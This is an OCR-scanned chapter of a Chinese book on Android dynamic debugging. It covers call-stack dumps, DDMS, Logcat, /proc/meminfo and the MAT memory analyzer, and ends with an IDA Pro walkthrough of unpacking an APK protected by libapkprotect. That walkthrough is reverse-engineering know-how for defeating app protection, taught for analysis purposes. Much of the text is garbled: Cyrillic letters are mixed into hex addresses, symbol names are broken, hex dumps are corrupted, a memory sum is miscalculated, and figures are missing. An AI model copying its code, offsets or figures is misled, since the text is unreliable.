05-18 17:33:55.899 W/System.err(252): at com.android.server.am.ActivityManagerService.onTransact(Activity 
Manager Service.java:1750) 


05-18 17:33:55.899 W/System.err(252): at android.os.Binder.execTransact(Binder.java:338) 


05-18 17:33:55.899 W/System.err(252): at dalvik.system.NativeStart.run(Native Method) 
通过 上 述 输出 信息 可 以 得 到 整个 程序 的 调用 流程 。 而 对 于 C/C++ 的 代码 程序 来 说 , 可 以 通过 在 函数 中 添 


加 如 下 代码 得 到 堆栈 信息 。 


信息 


514 


#ifdef_ARM_ 
LOGW ("print stack"); 
android::CallStack stack; 
stack.update(1, 100); 
stack.dump(""); 
#endif 
例如 ,在 文件 InputReader.cpp 中 的 dispatchTouches 开始 位 置 添加 如 下 代码 后 , 可 以 在 LOG 中 看 到 如 下 
05-18 17:33:20.882 D/InputReader(252): dump stack 
05-18 17:33:20.882 D/CallStack(252): #00 0х0х4с9557еа: < ZN7android16TouchInputMapper1 5dispatch 
Touche***j>+0x0x4c955791 


05-18 17:33:20.882 D/CallStack(252): #01 0х0х4с95615с: < ZN7android16TouchInputMapper4s упсЕх> 
+0x0x4c955ea5 


05-18 17:33:20.882 D/CallStack(252): #02 0х0х4с956214: < ZN7android16TouchlnputMapper7process EPKNS _ 
8RawEventE>+0x0x4c9561e1 


05-18 17:33:20.882 D/CallStack(252): #03 0x0x4c956226: <_ZN7android21MultiTouchInputMapper7 process 
EPKNS_8RawEventE>+0x0x4c956219 


05-18 17:33:20.882 D/CallStack(252): #04 0х0х4с958758: < ZN7android11InputDevice7process EPKNS _ 
8RawEventEj>+0x0x4c9586f1 


05-18 17:33:20.882 D/CallStack(252): #05 0x0x4c9587c0: <_ZN7android1 1InputReader28process EventsFor 
DeviceLockedEIPKNS_8RawEventEj>+0x0x4c958779 


05-18 17:33:20.882 D/CallStack(252): #06 0х0х4с9593ес: < ZN7android11InputReader19process Events 
LockedEPKNS_8RawEventEj>+0x0x4c9593b1 


05-18 17:33:20.882 D/CallStack(252): #07 0x0x4c9595be: < ZN7android11InputReader8loop OnceEv>+ 


0х0х4с959541 


зне asonpaa ОООО. 


05-18 17:33:20.882 D/CallStack(252): #08 Ox0x4c94fd0a: <_ZN7android17InputReaderThread 10threadLoopEv> 


+0x0x4c94fd01 


05-18 17:33:20.883 D/CallStack(252): #09 
+0x0x401516a1 


05-18 17:33:20.883 D/CallStack(252): #10 
ShellEPv>+0x0x401d2d9d 


05-18 17:33:20.883 D/CallStack(252): #11 
05-18 17:33:20.883 D/CallStack(252): #12 


05-18 17:33:20.883 D/CallStack(252): #13 


0x0x40151714: <_ZN7android6Thread11_threadLoop EPv> 


0х0х40142ае2: < ZN7android14AndroidRuntime 15javaThread 


pc00023d5a /system/lib/libutils.so 
Ox0x400ee118:« thread entry»*0x0x400ee0e4 


0x0x400edc68: <ріһгеаа сгеаіе>+0х0х400еарьо 


如 果 读 者 了 解 Android INI 的 基本 知识 ， 通 过 上 述 输出 结果 便 可 以 得 到 整个 程序 的 运作 信息 。 而 对 于 内 
核 堆栈 来 说 ， 只 需要 调用 dump_stack0 即 可 打印 出 堆栈 信息 。 

上 述 演示 代码 只 是 动态 调试 的 冰山 一 角 ， 其 实 谷歌 提供 了 第 三 方 工具 以 实现 Android 动态 调试 。 另 外 ， 
在 市 面 中 也 提供 了 很 多 Android 动态 调试 工具 。 在 本 章 接 下 来 的 章节 中 ， 将 一 一 为 读者 呈现 相关 内 容 。 


183 DDMS 动态 调试 
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DDMS (Dalvik Debug Monitor Service) 是 Android 开发 环境 中 的 Dalvik 虚拟 机 调试 监控 服务 。DDMS 
提供 了 测试 设备 截屏 功能 ， 并 且 针 对 特定 的 进程 查看 正在 运行 的 线程 以 及 堆 信息 、Logcat、 广 播 状 态 信息 、 
模拟 电话 呼叫 、 接 收 SMS、 虚 拟 地 理 坐 标 等 。 在 本 节 的 内 容 中 ， 将 详细 讲解 DDMS 的 基本 知识 。 


DDMS 界面 介绍 


在 安装 Android SDK Ji, DDMS 工具 被 存放 在 SDK/tools/ 路 径 下 ， 如 图 18-1 所 示 。 
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图 18-1 DDMS 的 保存 路 径 
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直接 双击 ddms.bat 即 可 运行 DDMS， 如 图 18-2 所 示 ， 也 可 以 通过 terminal/console(CLS) 输 入 ddms (在 
Mac 或 者 Linux. 系统 中 输入 .jddms) 启动 程序 。DDMS 对 Emulator 和 外 接 测试 机 有 同等 效用 。 如 果 系 统 检 
测 到 它们 СУМ) 同时 运行 ， 那 么 DDMS 将 会 默认 指向 Emulator. 
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图 18-2 启动 DDMS 后 的 界面 


另外 ， 在 使 用 Eclipse 打开 Android 工程 时 ， 通 过 Eclipse 右上 角 的 DDMS 选项 卡 也 可 以 打开 DDMS; 
如 图 18-3 所 示 。 


18-3 在 Eclipse 中 打开 DDMS 


DDMS 监听 第 一 个 终端 App 进程 的 端口 为 8600, APP 进程 将 分 配 8601, 如 果 有 更 多 终端 或 者 更 多 APP 
进程 将 按照 这 个 顺序 依次 类 推 。DDMS 通过 8700 端口 接收 所 有 终端 的 指令 。 


e 
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依次 选择 File | Option 命令 可 以 打开 Preferences 界面 ， 在 其 中 可 以 查看 DDMS 的 相关 设置 ， 所 有 的 参 
数 设 定 将 保 在 在 SHOME/.ddmsrc 中 ， 如 图 18-4 所 示 。 
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图 18-4 Preferences 界面 
接 下 来 在 Eclipse 中 导入 本 书 第 7 章 中 的 项 目 first， 来 了 解 DDMS 窗口 界面 的 基本 知识 。 
(1) Devices 
在 GUI 的 左上 角 可 以 看 到 标签 为 Devices 的 面板 ， 在 此 可 以 查看 到 所 有 与 DDMS 连接 的 终端 的 详细 信 
息 ， 以 及 每 个 终端 正在 运行 的 APP 进程 ， 每 个 进程 最 右边 相对 应 的 是 与 调试 器 连接 的 端口 。 因 为 Android 
是 基于 Linux 内 核 开发 的 操作 平台 ， 同 时 也 保留 了 Linux 中 特有 的 进程 ID， 它 介 于 进程 名 和 端口 号 之 间 ， 
如 图 18-5 所 示 。 
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18-5 Devices 面板 


在 面板 的 右上 角 有 一 排 很 重要 的 按钮 ， 分 别 是 Debug the selected process. Update Threads. Cause СС, 
Update Heap. Stop Process 和 ScreenShot。 各 个 按钮 的 具体 说 明 如 下 所 示 。 
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Debug the selected process: 绿色 小 臭虫 标志 ， 单 击 后 会 来 到 线程 调试 面板 。 

Update Threads: 用 于 查看 当前 进程 所 包含 的 线程 。 当 选中 任意 进程 后 ， 单 击 此 按钮 可 以 在 右 侧 面 
板 的 Threads 标 签 里 看 到 详细 的 线程 运行 情况 ， 同 时 在 被 选中 的 进程 名 称 后 会 出 现 显示 线程 信息 的 
标识 。 

Update Heap: 与 上 一 个 Update Threads 类 似 , 只 不 过 此 按钮 用 于 查看 当前 进程 堆栈 内 存 的 使 用 情况 。 
Stop Process: 用 于 终止 当前 进程 。 

ScreenShot: 截取 当前 测试 终端 桌面 。 

Cause GC: 显示 堆 的 详细 信息 。 


例如 ， 单 击 Cause GC 按钮 会 显示 堆 的 详细 信息 ， 并 附 有 针对 特定 分 配 类 型 的 分 配 大 小 图 示 ， 如 图 18-6 


所 示 。 
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图 18-6 Cause GC 面板 


如 果 有 分 配 泄漏 ， 这 可 能 是 一 个 很 好 的 检查 点 ， 通 过 观看 Heap Size HEAD) 的 总 体 趋势 ， 确 保 在 应 
用 运行 期 间 它 不 会 一 直 变 大 。 
(2) Emulator Control 
通过 Emulator Control 面板 的 功能 可 以 使 测试 终端 模拟 真实 手机 所 具备 的 一 些 交互 功能 , 例如 , 接听 电话 ， 
根据 选项 模拟 各 种 不 同 网 络 情况 ， 模 拟 接受 SMS 消息 和 发 送 虚 拟 地 址 坐标 用 于 测试 GPS 功能 等 ， 如 图 18-7 


所 示 。 


各 个 选项 的 具体 说 明 如 下 所 示 。 


(e пппппп 


Telephony Status: 通过 选项 模拟 语音 质量 以 及 信号 连接 模式 。 

Telephony Actions: 模拟 电话 接听 和 发 送 SMS 到 测试 终端 。 

Location Controls: 模拟 地 理 坐 标 或 者 模拟 动态 的 路 线 坐 标 变化 并 显示 预 设 的 地 理 标 识 。 
Manually: 手动 为 终端 发 送 二 维 经 纬 坐标 。 

GPX: 通过 GPX 文 件 导入 序列 动态 变化 地 理 坐 标 ， 从 而 模拟 行进 中 GPS 变化 的 数值 。 

KML: 通过 KML 文 件 导 入 独特 的 地 理 标识 ， 并 以 动态 形式 根据 变化 的 地 理 坐 标 显示 在 测试 终端 


图 18-7 Emulator Control 面板 


(3) Logcat 
在 Logeat 面板 中 会 显示 所 有 针对 测试 终端 操作 的 日 志 记 录 ， 这 样 可 以 很 明显 地 区 分 警告 信息 和 错误 信 
息 ， 如 图 18-8 所 示 。 
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FA 18-8 Logcat 面板 


Logcat 通过 android.util.Log 类 的 静态 方法 来 查找 错误 和 打印 系统 日 志 消息 ， 这 是 一 个 进行 日 志 输 出 的 
API, fE Android 程序 中 可 以 随时 为 某 一 个 对 象 插入 一 个 Log， 然 后 在 DDMS 中 观察 Logcat 的 输出 是 否 正 
常 。 在 类 android.util.Log 中 有 如 下 5 个 常用 的 方法 。 

Log.v(String tag, String msg); 
Log.d(String tag, String msg); 
Log.i(String tag, String msg); 
Log.w(String tag, String msg); 
Log.e(String tag, String msg); 

上 述 5 个 方法 的 首 字母 分 别 对 应 VERBOSE, DEBUG, INFO. WARN 和 ERROR。 当 利用 DDMS 进行 
调试 时 ， 其 区 别 并 不 大 ， 只 是 显示 的 颜色 不 同 ， 用 户 可 以 控制 要 显示 的 某 一 类 错误 ， 一 般 如 果 使 用 “ 断 点 ” 
方式 来 调试 程序 ， 则 使 用 Log.e 比较 合适 。 但 是 根据 规范 ， 建 议 Log.v 和 Log.d 信息 只 存在 于 开发 过 程 中 ， 
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最 终 版 本 只 可 以 包含 Log.i、Log.w Wl Log.e 3X 3 种 日 志 信息 。 
18.3.2 ”从 模拟 器 导出 文件 


通过 DDMS 可 以 从 模拟 器 中 导入 和 导出 文件 ， 通 过 Eclipse 打开 DDMS 视图 命令 ， 如 图 18-9 所 示 。 


Debug 
& Java (default) 


d Java Browsing 
Ln 


Tome rennes 


8-9 选择 DDMS 视图 命令 


打开 文件 浏览 器 ， 使 用 右上 角 的 导入 导出 按钮 可 以 操作 目标 文件 。 另 外 ， 也 可 以 选择 File Explorer 选项 
卡 来 到 文件 操作 窗口 ， 如 图 18-10 所 示 。 


$ Threads Ө Heap (g Allocation Tracker ^P Network Statistics 局 File Explorer 22 Q Emulator Control 


m [OS Wate] Tine В 72779098 [Info J i= 
田 5 acct 2014-05-08 00:58 drwxr-xr-x 
8 2 cache 2014-05-05 13:23 drwxrwx-— 
8 @ config 2014-05-08 00:58 -x 一 
Ba 2014-05-08 00:58 Lrwxrwarwx -> /sys 
8 ER date 2014-05-05 13:27 drwxrmrr-x 
18 defadlt.p — 116 1970-01-01 00:00 -rw-r—r— 
® @ dev 2014-05-08 00:59 drwxr-xr-x 
© ete 2014-05-08 00:58 lrwzrwxrwx -> /sys. 
D init 96676 1970-01-01 00:00 -rwxr-x-—- 


18 init. gold 2344 1970-01-01 00:00 -rmarx- 一 
国 init,re 16929 1970-01-01 00:00 -rwxr-x-— 


1970-01-01 00:00 dr-xr-xr-x 


2011-11-14 19:00 dwr 一 一 
1970-01-01 00:00 drwxr-x— 

© sdcard 2014-05-08 00:58 lrwzrwxrwx -> /ant. 
8 @ sys 1970-01-01 00:00 drwxr-xr-x 
9 © systen 2011-11-23 22:57 drwxr-xr-x 


8 ueventdg 272 1970-01-01 00:00 -rr—-- 
[D weventir 3825 1970-01-01 00:00 -rw-r—r— 
В vendor 2014-05-08 00:58 lrwxrwxrwx -> /sys 


图 18-10 File Explorer 界面 
在 一 般 情况 下 ，File Explorer 会 有 如 下 3 个 目录 : data, sdcard 和 system， 如 图 18-11 所 示 。 


($ Threads | @ Heap 


Wane Size Date Time Perniss 

m QS date 2009-08-25 07:40  drwxrwx—x 
8 Б а: 2009-08-25 07:41  drwxrwxrwx 
EE] 2009-08-25 07:40 drwxrwx--x 
® & p private 2009-08-25 07:40 “drwxrwx--x 
[E C dalvik-cache 2009-05-25 07:40  drwxrwx-x 
E= a 2009-08-25 07:40  drwxrwx— 
8 25 local 2009-08-25 07:40 。 drwxrwxr-x 
E © losttfound 2009-08-25 07:40 “drwxrwx-— 
© nise 2009-08-25 07:40 “drwxrwx-—t 
8 (> property 2009-08-25 07:40 drwx—--— 
© systen 2009-08-25 07:41 “drwxrwxr-x 

B 25 sdcard 2008-12-12 11:21 4— 

B © systen 2009-04-22 04:00 drwxr-xr-x 


18-11 data, sdcard 和 system 3 个 目录 


(1) data: 对 应 手机 的 RAM， 会 存放 Android OS 运行 时 的 Cache 等 临时 数据 (/data/dalvik-cache 目录 ) ; 
没有 root 权 限时 APK 程序 安装 在 /data/app 中 (只 是 存放 APK 文件 本 身 ); /data/data 中 存放 Emulator £k GPhone 
中 所 有 程序 (系统 APK+ 第 三 方 APK) 的 详细 目录 信息 ， 如 图 18-12 所 示 。 


Эу Threads Ө Hesp | Ci Ls 
Nane Size Date 
= Б data 2009-08-25 
а 2008-08-25 
9 б ар 2009-08-25 
© con. google. арк 11630 2009-12-12 
© con. google. widget. арк 1070984 2009-12-12 
QV. con. tour. activity. арк 149442 2009-12-12 
8 & p private 2009-08-25 
四 Ё dalvik-cache 2009-08-25 
S CS data 2009-08-25 
[= @ con. android. alarnclock 2009-08-25 
BB databases 2009-08-25 
司 daras. db 4096 2009-08-25 
* lib 2009-08-25 
困 (E con. android browser 2009-08-25 
© © con. android. calculator? 2009-08-25 
© © con. android. camera 2009-08-25 


18-12. data 目录 


(2) sdcard: 对 应 手机 设备 中 的 SD +. 
(3) system: 对 应 手机 中 的 ROM、OS 以 及 系统 自 带 APK 程序 等 存放 在 此 目录 中 。 


18.3.3 ”使 用 DDMS 获取 内 存 数据 


在 DDMS 中 有 一 个 很 不 错 的 内 存 监 测 工具 Heap， 使 用 Heap 可 以 监测 应 用 进程 使 用 内 存 的 情况 ， 具 体 

操作 步骤 如 下 所 示 。 

(1) 启动 Eclipse 后 ， 切 换 到 DDMS 透视 图 ， 并 确认 Devices 视图 、Heap 视图 都 是 打开 的 。 

(2) 将 手机 通过 USB 链接 至 电脑 ， 链 接 时 需要 确认 手机 是 处 于 “USB 调试 ”模式 ， 而 不 是 作为 Mass 
Storage。 

(3) 连接 成 功 后 ， 在 DDMS 的 Devices 视图 中 将 会 显示 手机 设备 的 序列 号 ， 以 及 设备 中 正在 运行 的 部 
分 进程 信息 。 

(4) 单 击 选中 想 要 监测 的 进程 ， 例 如 system process 进程 。 

(5) 单 击 选 中 Devices 视图 界面 中 最 上 方 一 排 图 标 中 的 Update Heap 图 标 。 

(6) 单 击 Heap 视图 中 的 Cause GC 按钮 。 

(7) 此 时 在 Heap 视图 中 就 会 看 到 当前 选中 进程 的 内 存 使 用 量 的 详细 情况 ， 如 图 18-13 所 示 。 

在 图 18-13 中 列 出 了 现在 系统 的 一 些 进程 和 使 用 情况 ， 其 中 ， 系 统 随时 可 以 用 的 两 项 内 存 是 Free 和 
Buffers， 因 为 笔者 设置 的 系统 只 有 128M 的 内 存 ， 所 以 看 上 去 这 部 分 可 用 内 存 已 经 很 少 了 。 笔 者 在 此 系统 中 
试 着 运行 很 占 内 存 的 游戏 等 应 用 程序 时 ， 并 没有 发 现 内 存 不 足 的 问题 。 鉴 于 这 个 原因 ， 认 为 这 张 图 并 不 能 
反映 出 要 得 到 的 系统 内 存 资源 信息 ， 因 此 只 能 从 另 一 个 角度 去 分 析 。 

在 /proc/cpuinfo 系统 中 保存 了 CPU 等 多 种 信息 ， 而 在 /proc/meminfo 中 保存 了 系统 内 存 的 使 用 信息 。 例 
如 在 /proc/meminfo 中 存在 如 下 信息 。 

MemTotal: 16344972 kB 

MemFree: 13634064 kB 

Buffers: 3656 kB 

Cached: 1195708 kB 
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È Threads Ө Allocation Tracker |) File Explorer ~au] 


Heap updates will happen after every GC for this client 
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图 18-13 ”内存 使 用 情况 


查看 机 器 内 存 时 ， 会 发 现 MemFree 的 值 很 小 。 这 主要 是 因为 在 Linux 中 有 一 种 思想 ， 内 存 会 尽 可 能 的 


cache 和 buffer 一 些 数据 ， 以 方便 下 次 使 用 。 但 实际 上 这 些 内 存 也 是 可 以 立刻 拿 来 使 用 的 。 所 以 : 
空闲 内 存 =free+buffers+cached=total-used 


通过 读 取 文 件 /proc/meminfo 的 信息 获取 Memory. 的 总 量 。 通 过 ActivityManager.getMemoryImfo 


CActivityManager.MemoryInfo) 可 以 获取 当前 的 可 用 Memory 量 。 
接 下 来 看 /proc/meminfo 数据 的 截图 ， 如 图 18-14 所 示 。 


ricky@ricky-laptop:~$ adb shell 

F daemon not running. starting it пом on port 5037 * 
* daemon started successfully * 

# cat /proc/meminfo 


MenTotal: 107756 kB 
MenFree: 1984 kB 
Buffers: 2464 kB 
Cached: 51988 kB 
SwapCached: 日 kB 
Active: 43476 kB 
Inactive: 49976 kB 
Active(anon): 34096 kB 
Inactive(anon): 5080 kB 
Active(file): 9380 kB 
Inactive(file): 44896 kB 
SwapTotal: Ө kB 
SwapF ree: 0 kB 
Dirty: Ө kB 
Writeback: Ө kB 
AnonPages: 39012 kB 
Mapped: 26772 kB 
Slab: 5164 kB 
SReclaimable: 2424 kB 
Sunreclaim: 2740 kB 
PageTables: 3536 kB 
NFS Unstable: Ө kB 
Bounce: Ө kB 
WritebackTmp: Ө kB 
CommitLimit: 53876 kB 
Committed AS: 1069292 kB 
VmallocTotal: 385024 kB 
VmallocUsed: 33996 kB 
VmallocChunk: 344068 kB 
# 


图 18-14 /proc/meminfo 数据 的 截图 
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在 图 18-14 所 示 的 截图 中 ， 对 于 Linux 系统 来 说 ， 可 以 立即 使 用 的 内 存 是 : 

MemFree+Buffers+Cache=556436kB 

系统 总 共 可 用 的 内 存 为 : 

MemTotal = 107756kB 

通过 运算 可 以 发 现 , 实际 上 系统 目前 还 有 52% 的 内 存 处 于 空闲 状态 , 和 从 DDMS 中 拿 到 的 图 相差 很 多 ， 
或 者 说 Google 隐藏 了 cache， 没 有 给 出 想 要 的 结果 。 

由 此 可 见 ，Android 系统 为 了 加 快 系统 的 运行 速度 会 在 系统 允许 的 情况 下 ， 大 量 使 用 内 存 作为 应 用 程序 
的 cache。 而 当 系统 内 存 紧 张 时 ， 会 首先 释放 cache 的 内 存 ， 这 也 就 是 依旧 能 运行 占 内 存 比 较 大 的 游戏 的 原 
因 。 由 此 可 以 总 结 出 ， 如 果 想 得 到 每 个 Android APP 的 内 存 比例 ， 可 以 用 DDMS 得 到 ， 如 果 想 判断 系统 内 
存 更 详细 的 信息 ， 可 以 用 Linux 的 “proc/meminfo”。 


18.3.4 Logcat 动态 调试 


Logcat 是 Android DDMS 中 的 一 个 命令 行 工具 ， 用 于 得 到 程序 的 log 信息 。 使 用 Logeat 的 方法 如 下 所 示 。 
logcat [options] [filterspecs] 
上 述 代 码 中 logcat 包括 如 表 18-1 所 示 的 选项 。 


表 18-1 logcat 的 选项 说 明 


X 项 说 M 
-b<buffer> 加 载 一 个 可 使 用 的 日 志 缓冲 区 供 查 看 ， 比 如 event 和 radio， 默 认 值 是 main 
-c 清除 屏幕 上 的 日 志 
al 输出 日 志 到 屏幕 
-f<filename> 指定 输出 日 志 信息 的 <filename>， 默 认 值 是 stdout 
-g 输出 指定 的 日 志 缓冲 区 ， 输 出 后 退出 
-n <count> 设置 日 志 的 最 大 数目 <count>， 默 认 值 是 4， 需 要 和 -r 选 项 一 起 使 用 
-r <kbytes> 每 <kbytes> 时 输出 日 志 ， 默 认 值 为 16， 需 要 和 -f 选 项 一 起 使 用 
-5 设置 默认 的 过 滤 级 别 为 silent 
-v <format> 设置 日 志 输入 格式 ， 默 认 的 是 brief 格式 


在 表 18-1 中 ，<format> 是 下 面 格式 中 的 一 种 。 

О -c: 清除 所 有 log 并 退出 。 

OQ -d: 得 到 所 有 log 并 退出 ， 不 阻塞 。 

О -g: 得 到 环形 缓冲 区 的 大 小 并 退出 。 

O -b <buffer>: 请 求 不 同 的 环形 缓冲 区 ，main' (RU) radio. events. 
O -В: 输出 log 到 二 进 制 中 。 


过 滤器 的 格式 是 如 下 所 示 的 串 。 

<tag>[:priority] 

事实 上 Logcat 的 功能 是 由 Android 的 类 android.util.Log 决定 的 ，Log 在 程序 中 使 用 了 如 下 方法 。 
Log.v() VERBOSE 

Log.d() DEBUG 

Log.i() INFO 

Log.w() WARN 

Log.e() ERROR 


Ж Log 的 级 别 依次 升 高 ，DEBUG 信息 应 当 只 存在 于 开发 中 ，INFO、WARN、ERROR 这 3 种 Log 
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将 出 现在 发 布 版 本 中 。 
对 于 Java 类 来 说 ， 可 以 声明 一 个 字符 串 常量 TAG，Logcat 可 以 据 此 来 区 分 不 同 的 Log。 例 如 ， 在 计算 
fit (Calculator) 的 类 中 定义 如 下 代码 。 
public class Calculator extends Activity ( 
Jic ss 
private static final String LOG TAG = "Calculator"; 
private static final boolean DEBUG = false; 
private static final boolean LOG ENABLED - DEBUG ? Config.LOGD : Config.LOGV; 
J|: esed) 
此 时 ， 所 有 在 Calculator 中 使 用 的 Log 都 是 以 Calculator 作为 开头 。 例 如 ， 使 用 如 下 方法 可 以 得 到 一 个 
Log 片段 。 
3t logcat & 
片段 如 下 所 示 : 
W/KeyCharacterMap(130): No keyboard forid 0 
W/KeyCharacterMap(130): Using default keymap: /system/usr/keychars/qwerty.kcm.bin 
\/ActivityManager(52): Displayed activity com.android.contacts/.DialtactsContactsEntryActivity: 983 ms 
WARMAssembler(52): generated scanline 00000077:03545404 00000A04 00000000 [ 29 ipp] (51 ins) at 
[0x25c978:0x25ca44] in 1764174 ns 
VARMAssembler(52): generated scanline__00000077:03515104 00000001 00000000 [ 46 ipp] (65 ins) at 
[0x25d1c8:0x25d2cc] in 776789 ns 
D/dalvikvm(130): GC freed 834 objects / 81760 bytes in 63ms 
D/dalvikvm(52): GC freed 10588 objects / 425776 bytes in 94ms 
在 上 述 片段 中 ，WVD 表示 Log 的 级 别 ，dalvikvm 和 ARMAssembler 表示 不 同 组 件 (component) 的 名 
称 ， 后 面 括号 里 面 的 数字 表示 了 发 出 Log 的 进程 号 。 


18.4 MAT 动态 调试 


Фи 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 18 章 \MAT 动态 调试 .avi 
在 开发 应 用 过 程 中 ,我 们 可 以 使 用 现成 的 工具 来 查看 内 存 泄漏 情况 。 例 如 DDMS ffl MAT. 其 中 , MAT 
是 Memory Analyzer Tool 的 缩写 ， 是 一 个 Eclipse 插件 ， 同 时 也 有 单独 的 RCP 客户 端 。 笔 者 使 用 的 是 MAT 
的 Eclipse 插件 ， 使 用 插件 要 比 RCP 稍微 方便 一 些 ， 下 载 后 的 目录 结构 如 图 18-15 所 示 。 
Amat zi 


c Eonfiguration CJ features dd 
| 
=a] plugins LJ workspace 
| 
epl-vi0. hal 
C] eclipsec. exe ° HTML D ә MemoryAnalyzer. exe 
y. MemoryAnelyzer. ini notice. htal 
eee ч Pirates р 
Ed e 


Ё 18-15 MAT 的 文件 目录 
双击 图 18-15 中 的 MemoryAnalyzer.exe 可 以 打开 MAT， 打 开 后 的 界面 如 图 18-16 所 示 。 


(m, 


facts. xal 


1Ф 


图 18-16 打开 MAT 后 的 界面 
这 样 通过 图 18-16 中 的 File 菜单 可 以 打开 用 DDMS 生成 的 .hprof 文件 ， 打 开 一 个 .hprof 文件 后 的 界面 如 


图 18-17 所 示 。 
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18-17 分 析 界 面 


从 图 18-17 中 可 以 看 到 MAT 的 大 部 分 功能 ， 具 体 说 明 如 下 。 
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(1) Histogram: 可 以 列 出 内 存 中 的 对 象 、 对 象 的 个 数 以 及 大 小 。 

(2) Dominator Tree: 可 以 列 出 线程 以 及 线程 下 面 的 对 象 占用 的 空间 。 

(3) Top Consumers: 通过 图 形 列 出 最 大 的 object。 

(4) Leak Suspects: 通过 MA 自动 分 析 泄漏 的 原因 。 
选择 Histogram 选项 卡 后 的 界面 如 图 18-18 所 示 。 
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18-18 Histogram 界面 


图 18-18 中 主要 选项 的 说 明 如 下 。 
口 Objects: 类 的 对 象 的 数量 。 
0 Shallow Heap: 即 对 象 本 身 占用 内 存 的 大 小 ， 不 包含 对 其 他 对 象 的 引用 ， 也 就 是 对 象 关 加 成 员 变量 
(不 是 成 员 变量 的 值 》 的 总 和 。 
0 Retained Heap: 即 该 对 象 自己 的 Shallow size, 加 上 从 该 对 象 能 直接 或 间接 访问 到 对 象 的 Shallow size 
ZAM. MAE, Retained size 是 该 对 象 被 GC 之 后 所 能 回收 到 内 存 的 总 和 。 
选择 dominator-tree 选项 后 的 界面 如 图 18-19 所 示 。 
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图 18-19 dominator-tree 界面 
选择 Overview 选项 卡 后 的 界面 如 图 18-20 所 示 。 
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18-20 Overview 界面 
单 击 图 18-20 下 方 的 Leak Suspects 超 链接 后 ， 可 以 查看 详细 的 内 存 报 表 ， 如 图 18-21 所 示 
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图 18-21 Leak Suspects 查看 详细 的 内 存 报 表 


185 ”实战 演练 一 -IDA Pro 动态 调试 


Фа 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 18 ŽIDA Pro 动态 调试 .avi 


IDA Pro 也 是 一 款 功 能 强大 的 动态 调试 工具 。 在 本 节 的 内 容 中 ， 将 以 第 13 章 13.4.3 节 中 实例 为 基础 ， 
使 用 IDA Pro 动态 分 析 加 壳 之 后 的 APK 文件 。 


| BB | —— 1| a D 1 源码 路 径 | 
йз bol IDA Pro 动 态 调试 l... jx Э байтів); 


DI Android £9? 4 o R8 i8 sc 


18.5.1 分 析 函 数 JNI_OnLoad() 


函数 Init() 和 原来 的 函数 JNL OnLoad0 中 的 字符 串 都 经 过 了 加 密 处 理 。 在 libapkprotect.so 中 的 加 密 流程 
比较 复杂 ， 并 且 涉 及 比较 多 的 Dalvik 虚拟 机 中 结构 ， 此 时 必须 视 同 IDA 动态 调试 了 。 
(1) 首先 把 data/data/com.lakala.android/lib 下 的 so 用 脱 壳 后 so 替换 掉 ， 然 后 开始 对 android server Ж 
行 配 置 。 准 备 好 分 析 工 具 : IDA+readelffAPk_ IDE+dex2jar+jd-gui 和 Android 源码 。 
(2) 首先 分 析 so 执行 的 流程 INI OnLoad， 在 断 点 模式 开始 调试 。JNL OnLoad 函数 的 功能 是 初始 化 一 
个 结构 域 ， 定 义 结构 的 代码 如 下 所 示 。 
typedef struct _apk_protector_runtime{ 
int flag; 
11 bool dymDbgisDebuggerConnected(void) 0x4 
void *pfn dvmDbglsDebuggerConnected; 
11 0x8 (DvmDex's memMap - odex pointer) 
int DyvmDex memMap to Odex delta; 
bool mprotect flag; 1 Охс 
bool cacheflush flag; 1 Оха 


int androidOS version; 11 Ox10 system property get("ro.build.version.sdk", &androidOS version); 


void *pfn dvmThreadSelf; 11 0x14 

11 ClassObject* dvmFindLoadedClass(const char* descriptor); 
void *pfn dvmFindLoadedClass; 1 0x18 

// char* dvmNameToDescriptor(const char str); 

void *pfn_dvmNameToDescriptor; I| Ox1c 

// char* dymDescriptorToName(const char str); 

void *pfn dvmDescriptorToName; 1 0x20 

bool had decrypt methods; I| 0x24 


Japk protector runtime; 

通过 上 述 代码 可 知 ， libapkprotect 定义 了 一 个 全 局 的 结构 体 。 在 JNI OnLoad 中 初始 化 这 个 结构 体 ， 然 
后 在 函数 Init(0) 中 使 用 。 

(3) 开始 分 析 函 数 JNL OnLoad0 的 开头 部 分 ， 如 图 18-22 所 示 。 
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see2F8E ton Ra, –васва 
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图 18-22 函数 JNL OnLoad() 的 开头 部 分 


MIN C — 让 


在 上 述 开 头 部 分 中 ，_system_property_get 和 Android 源码 中 的 函数 int — system property get(const char 
*name, char *value) 相 对 应 ,此 函数 的 功能 是 获取 Android 系统 的 属性 。 其 中 , 参数 name 和 ro.build.version.sdk 
相对 应 ， 功 能 是 获得 系统 SDK 版 本 号 。 参 数 value 存储 的 是 版 本 号 的 字符 串 。 

接 下 来 atoi 会 把 字符 串 转 为 int 格式 ， 并 放 到 apk protector runtime 结构 的 Oxe 偏 移 上 ， 即 上 面 结 
0) арк protector runtime 中 的 androidOS version 中 。 

(4) 开始 看 strlen， 功 能 是 获得 一 个 字符 串 的 长 度 。 将 IDA FA 定位 到 strlen 上 ， 此 时 会 发 现 r0 地 址 是 
8040B044。 在 Hex-view 定位 时 ， 也 会 看 到 还 有 类 似 这 样 被 加 密 的 字符 串 ， 如 图 18-23 所 示 。 


80408014 6E 79 38 62 4D 6B 45 30 Ар 78 2B 2B 00 00 00 00 nySDHKEGMxes.... 
волово2а 6р AC 47 62 4D 6B 45 30 8 mLGbHKEOHTOSnrGX 
B0n08035 ME 73 34 53 6C 32 49 53 
BO^0BOhA. 32 87 34 6E 32 49 53 
8040805 AE 63 53 71 4D hh 4D 57 
BO^DBDóh Ас 30 74 59 66 31 ^9 31 
80408075 4D 43 47 53 AE 63 4D 31 00 00 00 00 4C 30 74 59 MCGSNCH1....LOtV 
BO^OBDSA 67 63 49 31 NE бй AD 55 ДЕ 73 49 66 4E 31 h3 72 gcI1NjMUNSIFNICT 
Ranenaoh Ah AR һа мо MF ќа hq са AF ав А NÁ AE 7а эй ой MYTRNEP7NAOF Ives 


图 18-23 ”加 密 的 字符 串 
开始 查寻 地 址 8040B044 是 怎么 得 来 的 ， 如 图 18-24 所 示 。 


BONO2EGA LOR — R7, -(Unk 8080008 - 0x80502E70) 
80402E6C LOR RS, -(apk protector runtlime - 0x80402E86) 


4 LBtYF1I1NKItnskQ 


图 18-24 ”地址 8040B044 
(5) 开始 分 析 sub_804075F0， 具 体 代码 如 图 18-25 所 示 。 


IBUAUZE9U mous RI, 0x109 
80402E9% ADD RO, SP 


80402EBA 

80402EBA 10c_80402EBA 

